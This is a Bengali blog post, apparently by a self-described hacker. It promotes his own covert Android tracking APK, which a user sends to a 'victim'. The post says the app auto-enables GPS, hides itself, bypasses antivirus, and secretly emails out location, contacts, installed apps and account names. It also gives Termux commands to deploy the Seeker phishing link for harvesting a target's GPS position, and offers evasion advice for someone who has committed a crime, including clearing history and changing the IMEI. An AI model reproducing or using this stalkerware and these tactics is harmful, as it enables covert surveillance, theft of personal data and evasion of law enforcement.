(TheGm404)পুলিশ ও হ্যাকার এর মত করে লোকেশন ট্র্যাক করুন+My privet tracker টুলস রিভিউ+Proof সহ পোস্ট

আসসালামু আলাইকুম
আশা করি সবাই ভাল আছেন এবং সুস্থ আছেন।

আজকের পোস্টের বিষয় হল লোকেশন ট্রাকিং। লোকেশন ট্রাকিং একটি ট্রেন্ডিং টপিক।

আপনি চাইলেই যে কোন ব্যক্তির লোকেশন ট্র্যাক করতে পারবেন না। এর জন্য দরকার হবে আপনার কিছু পারমিশন অথবা নির্দিষ্ট টেকনিক।

আজকের আর্টিকেলটি পড়ার পর হয়তো আপনারা সব ধারণা প্র্যাকটিক্যাল পেয়ে যাবেন এবং আর অন্য কোন প্লাটফর্মে লোকেশন ট্রেকিং নিয়ে ঘাটাঘাটি করার চেষ্টা করবেন না।

আজকের টপিক এর সূচিপত্র:
১) লোকেশন ট্রাক কি ও উপায়গুলো
২) পুলিশ যেভাবে লোকেশন ট্র্যাক করে
৩) আমার বানানো Gps ট্র্যাকার রিভিউ
৪) লিংকের মাধ্যমে লোকেশন ট্রাক
৫) Gsm সিগনাল এর মাধ্যমে লোকেশন ট্রাক
৬) পুলিশ বা হ্যাকার কে লোকেশন ধোকা দেওয়া
৭) লোকেশন ট্রাকিং প্রতিরোধ করা

#১) লোকেশন ট্রাক কি ও উপায়গুলো:
অন্য কারো পারমিশন ছাড়া তার লোকেশন দেখাই হল লোকেশন ট্রাক। মনে করুন আপনি কোথায় আছেন সেটা আমি বলে দিচ্ছি কোন প্রযুক্তি ব্যবহার করে এটাই লোকেশন ট্রাক।

লোকেশন ট্র্যাক তিন ভাবে হতে পারে:
i)GPS EXACT LOCATION TRACK
ii)GSM TRACK
iii)IP GEO LOCATION TRACK

i)এরমধ্যে জিপিএস ট্রেকিং সবথেকে পাওয়ারফুল। এটি ট্র্যাক করে আপনি তার বাসায় গিয়ে পৌঁছাতে পারবেন। এককথায় আপনি সরাসরি তার কাছে চলে যেতে পারবেন।

ii)সিম ট্রাকিং কে জিএসএম ট্রাকিং বলে। যা সাধারণত পুলিশ ও গোয়েন্দা সংস্থার লোকজন ব্যবহার করে। এটির মাধ্যমে ভিকটিম লোকেশন ট্র্যাক করা যায় বাট সেটা তার রেঞ্জের দেড় থেকে দুই কিলোমিটারের মধ্যে মানে তার এলাকার লোকেশন ট্র্যাক করা যেতে পারে।

iii)আইপি ট্রাকিং একটি ব্যবহৃত জনপ্রিয় সিস্টেম হতো যদি আমরা আমেরিকা বা কোন প্রসিদ্ধ দেশে বসবাস করতাম যেখানে সবাই ব্রডব্যান্ড ইউজ করে। কারণ ব্রডব্যান্ড ইউজারদের আইপি দিয়ে তাদের খুব কাছাকাছি রেঞ্জের সম্বন্ধে ধারণা পাওয়া যায়। আর সিম এর আইপি স্ট্যাটিক না তাই আপনার বাড়ি ঢাকা হলে আপনার বাড়ি দেখাবে চট্টগ্রাম।

তবুও একটু এক্সাম্পল দেখে নেই:
ip2location.com এ যান
তারপর স্কল করলে একটা বক্স পাবেন
সেখানে আইপি দিয়ে দিন তারপর সার্চ এ ক্লিক করে 4-5 সেকেন্ড অপেক্ষা করুন তাহলেই লোকেশন দেখতে পারবেন।

#২) পুলিশ যেভাবে লোকেশন ট্র্যাক করে:
পোস্টের প্রথমেই বলছি লোকেশন ট্রেকিং করতে পারমিশন দরকার যা সবাই পায়না। পুলিশ সাধারণত হারিয়ে যাওয়া ডিভাইসের জিমেইল লগইন এর চেষ্টা করে যদি তা জানা থাকে।
অন্যথায় সিম কোম্পানিকে ইনফর্ম করে যে ওই মালিকের নাম্বারে ব্যবহৃত রেজিস্টার্ড imei দিতে নতুন কোন সিম ব্যবহার করা হচ্ছে কিনা। যদি ওই সেম আই এম ই আই তে নতুন কোন সিম প্রবেশ করানো হয় তাহলে ঐ সিমের কল ডিটেইলস কল রেকর্ড এবং জিএসএম ইনফর্মেশন সিম কোম্পানি পুলিশ বা গোয়েন্দা সংস্থাকে দিয়ে সাহায্য করতে পারে যা আপনাকে আমাকে দিবে না।
এটা জিএসএম ট্রাকিং এর আওতায় পড়ে যদি ফোনটি অফ্লাইন টু জি স্মার্টফোন হয়।

#৩)আমার বানানো Gps ট্র্যাকার রিভিউ:
বিভিন্ন স্পাইওয়্যার ওয়েবসাইটে জিপিএস ট্র্যাকিং অপশন রয়েছে। তো সেটা দেখে একদিন আমি ভাবি যে ভিকটিমের ফোন দুটি হাতে না নিয়ে এটা করা যায় তাহলে দারুন হবে আর সেটা যদি আরো পারফেক্ট হয় মানে এক্সাট লোকেশন তাহলে তো কথাই নেই।

তো যেই ভাবনা সেই কাজ:
প্রথমে পরিকল্পনা করি তারপর আস্তে আস্তে একটু একটু করে কমপ্লিট করি। যদিও যে সময়ে গিয়েছে সেটা অনেক ব্যয়বহুল। সর্বমোট 16 17 দিন লেগেছিল শুরু থেকে শেষ দিন পর্যন্ত।

তো এপিকে টি সেটআপ এবং ব্যবহার জেনে নেই:
সেটাপ দিতে যা যা প্রয়োজন:
১) একটি জিমেইল অ্যাকাউন্ট
২) এপিকে এডিটর প্রো

—————১——————-
নতুন একটি জিমেইল একাউন্ট করে নিন।সিকিউরিটিতে ট্যাব থেকে লেস সিকিউর অপশনটি এনাবল করে দিন। টু স্টেপ অথেন্টিকেশন অন থাকলে অফ করে দিন। ব্যাস জিমেইল সেটাপের কাজ শেষ।

————–২——————————-

i) GPS F.apk ডাউনলোড করুন

Download Link:https://bit.ly/GPS_Forwarder

ii) apkeditor প্রো দিয়ে ওপেন করুন

iii) Full Edit এ ক্লিক করুন
iv)res>value>string.xml ফাইল ওপেন করুন

v) আপনার জিমেইল এবং পাসওয়ার্ড দিয়ে সেভ দিন এবং এপিক এটা বিল্ড করে দিন

ইন্টারনাল স্টোরেজ বা ফোন মেমোরিতে এপিকে এডিটর নামের ফোল্ডারে আপনার buid করা এপটি পেয়ে যাবেন এটাই আপনার কাঙ্খিত ট্রাকার।

ভিকটিমের ফোনের যেসয ইনফর্মেশন আমি পাব:-
★Phone Model
★Phone Brand
★Phone Serial
★COUNTRY
★CITY
★STATE
★PIN
★LocalArea
★HOUSE/ROAD NO
★Maps Exact Tracking Link
★District
★Save Contact List
★List Of All Install Apk
★List Of All Accounts Name(gmail/imo etc)

##অ্যাপটির কিছু সুবিধা ফিচার:
1)Auto Location On
2)After Open This Auto Hide
3)Hidden background Send Location Gmail
4)After Rebot auto start
5)0-36 All Antivirus Bypssed
6)It’S Use Only Data(0 Cost)

কোনভাবেই ভিকটিমের ফোন হাতে নেওয়া লাগবে না। লেটেস্ট এন্ড্রয়েড ফোন গুলোতে একটু সমস্যা করে backround process এ। ফোন রিবুট করার পর অটোমেটিক আবার শুরু হয়ে যাবে apk background রানিং। আপনি চাইলে আপনার ফোন চুরি হওয়ার আগেই সতর্ক থাকার জন্য অ্যাপটি ইন্সটল করে দিতে পারেন তবে চোর যদি ফোনটা নিয়ে flash করে অ্যাপটি ডিলিট হয়ে যাবে।

একটু ব্যাখ্যা করি:
যখন এটি ইন্সটল দিবেন আপনার সাথে কি রকম আচরণ করবে:

#এপিকে টি যখন ভিকটিমকে পাঠাবেন সে যখন ইন্সটল করে ওপেন করবে তার জিপিএস অটো অন হয়ে যাবে।(যদি অফ থাকে)

##তারপর ট্রাক আর টি ভিকটিমের সব ইনফরমেশন তারমধ্যে স্টোর করবে এবং জিমেইল এ পাঠিয়ে দিবে।

###তারপর এপিকেটা অটোমেটিক হাইড হয়ে যাবে

####হে মেসেজ পাঠানোর জন্য শুধু ডাটা খরচ প্রয়োজন কোন টাকা লাগবেনা। হ্যাঁ এটি সহ এন্টিভাইরাস বাইপাস মানে কোন এন্টিভাইরাস বা গুগোল প্রটেক্ট এটাকে ভাইরাস হিসেবে ডিটেক্ট করবে না। এটি অ্যান্ড্রয়েড টেন ভার্সন সাপোর্টেড।

আমি তেমন ভাবে রিভিউ করতে পারলাম না কারণ এমনিতেই পোস্টে প্রচুর সময় লাগছে একটা ভিডিও করেছে ইউটিউবে আপনারা ওটা এটুজেড সেটআপ সহ দেখে নিবেন।
ওখানে Proof ও দেওয়া আছে জিমেইল এর।


Youtube:Gm Smart Hacker সার্চ দিলেই পাবেন

৪) লিংকের মাধ্যমে লোকেশন ট্রাক:
তো অনেকেই বলবেন আমিতো জিপিএস ট্র্যাকার বানিয়েছে অ্যান্ড্রয়েডের জন্য কিন্তু উইন্ডোজ বা লিনএক্স /মেক ইউজারদের একুরেট লোকেশন কিভাবে ট্র্যাক করব।

এজন্য আমরা টারমাক্স এর একটু একটু সাহায্য নিব 🙂

তো শুরু করা যাক:
নিচের স্টেপগুলো ফলো করুন:
i) প্রথমে প্লে স্টোর থেকে Termux ডাউনলোড করুন
ii) তারপর ওপেন করে নিচের কমান্ডগুলো একে একে পেস্ট করুন
$pkg install git -y

$git clone https://github.com/thewhiteh4t/seeker
$pkg install python -y
$cd seeker
$bash termux_install.sh
$python3 seeker.py

iii) তারপর ngrok সিলেক্ট করুন
iv) এখানে একটা লিঙ্ক জেনারেট হবে যাকে হ্যাক করতে চান তার তার কাছে লিঙ্ক টা সেন্ড করুন। সে যখন আপনার পাঠানো লিংকে ক্লিক করবে তখন তার কাছে একটা পপ আপ হবে সে যদি লোকেশন পার্মিশন করে দেয় তার জিপিএস এর এক্সাট লোকেশন আপনার টারমাক্স মধ্যে দেখতে পারবেন।

যদি কেউ বুঝতে না পারেন তাহলে ইউটিউবে গিয়ে সার্চ দেন (seeker location tracker Review) তাহলে সম্পূর্ণ ক্লিয়ার হয়ে যাবেন।

৫) Gsm সিগনাল এর মাধ্যমে লোকেশন ট্রাক:-

জিএসএম ট্রাকিং এর মাধ্যমে লোকেশন ট্র্যাক করে মূলত অপরাধী ধরা হয়। এটি আমাদের কাছে তেমন কোন টপিক না হলেও পুলিশ এবং গোয়েন্দা সংস্থার কাছে এটি মেন হাতিয়ার। যদিও এটি করে এক্সাক্ট লোকেশন পাওয়া সম্ভব না কিন্তু তার লোকেশন এর সম্বন্ধে ধারণা পাওয়া যায়।

1500 থেকে 2000 মিটার এর কাছাকাছি লোকেশন সম্বন্ধে স্পষ্ট ধারণা পাওয়া যায়। আপনি যদি জিএসএম নিয়ে কাজ করেন তাহলে হয়তো বিষয়টা বুঝবেন।
LAC=LOCAL AREA CODE
MCC/MCN
ধরুন আপনার ফোন তো কোন না কোন তাহলে সাথে কানেক্টেড আছে। টাওয়ারটি কোন এরিয়া কোড এর অন্তর্ভুক্ত সেখান থেকে আপনার ফোনে সিগন্যাল এর ক্ষমতা কতটুকু। এসব গাণিতিক হিসাব নিকাশ করে জিএসএম ট্রেকিং করা হয়।
যেমন আপনি আপনার ফোনের এবাউট স্ট্যাটাস অপশনে গিয়ে দেখতে পারবেন স্ট্যাটাস নামে একটি অপশন রয়েছে। তো এখানে গেলে আপনি কিছু সিমের তথ্য দেখবেন এই তথ্যগুলো কে ব্যবহার করেই জিএসএম ট্র্যাক করা হয়। অনেকে আবার বলবেন আমার ফোনের সিমের তথ্য পুলিশ কিভাবে জানবে । তারা কোন জাদুকর নই তাদের এ কাজে সাহায্য করবে সিম অপারেটর কোম্পানি।তবে কোনো আইটি এক্সপার্ট ব্যক্তি যদি আপনার ফোনের এই ইনফোগুলো কালেক্ট করতে পারে তাহলে সেও আপনার জিএসএম ট্রেকিং করতে পারে যদিও আপনি অফলাইন হন তাতে কিছু যায় আসে না এটাই জিএসএম ট্রাকিং এর আরেকটি সুবিধা।

যে সিম ট্রাকিং একটি বিরাট চাপটার এটি নিয়ে আমি আরেকটি পোস্ট করতে চাই যদি আপনারা চান সেখানে ক্যালকুলেশনে সহ এটুজেড দেখানো হবে।

৬) পুলিশ বা হ্যাকার কে লোকেশন ধোকা দেওয়া:-
আপনার ফোনে হঠাৎ নোটিফিকেশন এসেছে আপনাকে কেউ ট্রাক করতেছে (যদি গুগল অ্যাকাউন্ট ব্যবহার করে ট্র্যাক করে) তখন সেই মুহূর্তে আপনি কি করবেন?

যদি আপনার ফোনে লোকেশন অফ করে দেন তাহলেতো হ্যাকার বা ট্রাক কারী ব্যক্তি টের পেয়ে যাবে যে আপনি হয়তো বুঝে গেছেন।

এই সিস্টেমটাকে আমরা স্পুফিং বলতে পারি:
তিনটা স্টেপ ফলো করে আপনিও চাইলে স্পুফিং করতে পারেন:

১)Mock gps ডাউনলোড করে ইন্সটল করুন

২) এবাউট ফোন থেকে build number এ 7 বার ক্লিক করুন। ফোনে ডেভলপার অপশন নামে একটি অপশন পেয়ে যাবেন।

এখন ডেভলপার অপশন এ গিয়ে Mock location app এ ক্লিক করুন। এবং এইমাত্র ইন্সটল করা Mock জিপিএস অ্যাপ টি সিলেক্ট করে দিন।

Download Link:https://m.apkpure.com/mock-locations-fake-gps-path/ru.gavrikov.mocklocations/download-apk-info

৩) আপনার ফোনে লোকেশন অন করুন। mock জিপিএস অন করে ইচ্ছামত একটি লোকেশন সার্চ করে সেটার উপর 3 সেকেন্ড click করে রাখুন।

ব্যাস আপনার কাজ শেষ। এখন গুগল ম্যাপ ওপেন করে মাই লোকেশন দেখুন আপনি mock জিপিএস এ যে লোকেশন রেখেছেন সেটাই শো করতেছে।

৭) লোকেশন ট্রাকিং প্রতিরোধ করা:-

পৃথিবীতে সিকিউরিটি বলতে কোন শব্দ নেই। যত সিকিউরিটি আছে ততো সিকিউরিটি ভাঙ্গা সিস্টেম রয়েছে। তবে সিকিউর থাকতে চাওয়া দোষের কিছু নাই।

ধরুন আপনি এমন কোন অপরাধ করে ফেলেছেন আপনি জানেন আপনাকে অবশ্যই ট্র্যাক করা হবে। আপনি অনেক আতঙ্কে রয়েছেন ঠিক সেই মুহূর্তে কি করবেন?

১) আপনার বাসা বাড়ি বা বাসস্থান থেকে প্রথমে দুই তিন কিলোমিটার দূরে যান

২)আপনার ফোনের ব্যাটারি যদি রিমুভ করা যায় সেটা রিমুভ করে দিন অন্যথায় ফোন থেকেছি সিম খুলে নিন।

৩) আপনি যদি কোন ওয়াইফাই বা ব্রডব্যান্ড কানেকশন এর সাথে সংযুক্ত থাকেন সেটা ডিসকানেক্ট করে ফেলুন

৪) দ্রুত গুগল একাউন্টে লগইন করুন।সেখানে লোকেশন হিস্টরি এবং সার্চ হিস্ট্রি নামে দুটি জিনিস দেখতে পারবেন সেগুলো অল ক্লিয়ার করে দিন। মনে রাখবেন সবাই এই ভুলটি করে যার জন্য খুব তাড়াতাড়ি আইনি ফাঁদে ধরা পড়ে যায়।

৫)অনেকে ফোনে এয়ারপ্লেন মোড অন করে রাখে ভাবে যে আমার সিম হয়তো বন্ধ কিন্তু এটা আপনার সম্পূর্ণ ভুল ধারণা এয়ারপ্লেন মোড অন করে সিন সফটওয়্যার এর সাথে ডিসকানেক্ট হয় ঠিকই কিন্তু হার্ডওয়ার সাথে কানেক্টেড থাকে।
আমার কথা না বিশ্বাস হলে আপনি সাইলেন্ট পিং করে দেখতে পারেন। সাইরেন নিয়ে পরবর্তীতে একটি পোস্ট করব।

৬) আপনার ফোনের অল অ্যাপস অপশন এ যান। এখন দেখুন কোন অ্যাপ জিপিএস পারমিশন নিচ্ছে সেগুলো অফ করে দিন।

৭)যদি সম্ভব হয় ফোন রুটেড থাকে তাহলে ফোনের আইএমইআই নাম্বার টা চেঞ্জ করে দিন সাথে ম্যাক এড্রেস ও। ফোনটি পারবে রিসেট দিয়ে দিন যাতে কোনো হিস্টরি ফোনে গোপোনেও না থাকে।

আশা করি এই স্টেপে অনুসরণ করলে কোন লোকেশন ট্রাকিং সিস্টেম এই আপনাকে ট্র্যাক করতে পারবে না।

আরো কিছু জনপ্রিয় লোকেশন ট্রেকিং এর মাধ্যম হলো:
১) কুকি এনালাইজ
২) ব্রাউজিং হিস্টরি এনালাইজ
৩) গুগোল লোকেশন হিস্টরি
৪) জিএসএম ক্যাচার ডিভাইস
৫) লোকেশন ট্রাকিং স্পাই প্রোগ্রাম

কিছু কথা:আপনি আজ থেকে শুরু করে আগামী এক সপ্তাহ পর্যন্ত ইন্টারনেটে খুঁজুন এমন কোন সফটওয়্যার পাবেন না। এটির কনসেপ্ট + রিলিস
দুটোই আমি করেছি। যে পরিমাণ সময় এটার জন্য ব্যয় করেছি তা অনেক ব্যয়বহুল। প্রথমে ভাবছিলাম শুধু আমি ইউজ করবো যেহেতু এটা পাবলিক করে দিয়েছি আপনারা সবাই ইউজ করতে পারেন কোন সমস্যা নাই ।কিন্তু কপি করলে অবশ্যই ক্রেডিট দিয়ে করবেন। আশা করি আপনারা এটির মাধ্যমে স্ক্যামারদের ধরতে পারবেন যারা অন্যের সাথে অনলাইনে স্কাম করে ।
আর হ্যাঁ এটি কেউ বিক্রি করবেন না এটি বিক্রি করার জন্য তৈরি করা হয়নি। তো কেমন লাগলো আমার রিমোটলি লোকেশন হ্যাকিং অ্যাপ সবাই কমেন্ট করে জানাবেন।

সবাই ভাল থাকবেন আসসালামু আলাইকুম।

About Me:-
From:Cyber Security
Youtube:Gm Smart Hacker
Facebook:Team Bangladesh

Leave a Reply